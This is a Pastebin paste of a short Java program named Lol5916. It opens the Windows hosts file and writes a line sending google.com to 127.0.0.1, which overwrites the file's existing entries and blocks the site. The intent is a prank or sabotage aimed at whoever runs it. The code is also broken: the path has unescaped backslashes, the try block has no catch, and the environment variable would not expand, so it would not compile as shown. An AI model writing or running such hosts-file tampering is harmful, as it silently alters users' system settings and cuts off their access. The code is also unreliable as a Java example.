Advertisement
Guest User

Untitled

a guest
Jul 21st, 2017
59
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Java 0.27 KB | None | 0 0
  1. import java.io.*;
  2. public class Lol5916
  3. {
  4. public static void main (String args[])
  5. {
  6. FileOutputStream fout; 
  7.  
  8. try
  9. {
  10. fout = new FileOutputStream ("%SystemRoot%\System32\drivers\etc\hosts");
  11.  
  12. new PrintStream(fout).println ("127.0.0.1 google.com");
  13. fout.close();  
  14. }
  15. }  
  16. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement